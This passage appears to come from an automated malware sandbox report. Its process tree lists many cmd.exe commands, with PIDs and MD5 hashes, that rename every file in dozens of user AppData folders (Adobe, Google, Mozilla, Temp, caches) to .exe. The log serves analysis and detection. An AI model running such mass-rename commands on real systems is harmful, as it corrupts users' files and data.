            • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 368 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7888 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7732 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3732 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6680 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5000 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3772 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3308 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7768 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6164 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4676 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5328 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7628 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4220 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5788 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4668 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7716 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5692 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3688 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8068 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5688 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7876 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6396 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3976 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4912 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5716 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7444 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8168 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7568 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5396 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1052 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3948 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2380 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1480 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6512 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6200 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3436 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8176 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6656 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3808 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5804 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5588 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5952 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5760 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4140 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5676 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6452 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6180 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5364 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4276 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8116 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 8184 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7056 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5688 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7372 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7636 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6064 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7556 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7040 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5300 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2780 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5324 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4740 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3424 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7452 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5988 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5708 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5652 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6780 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
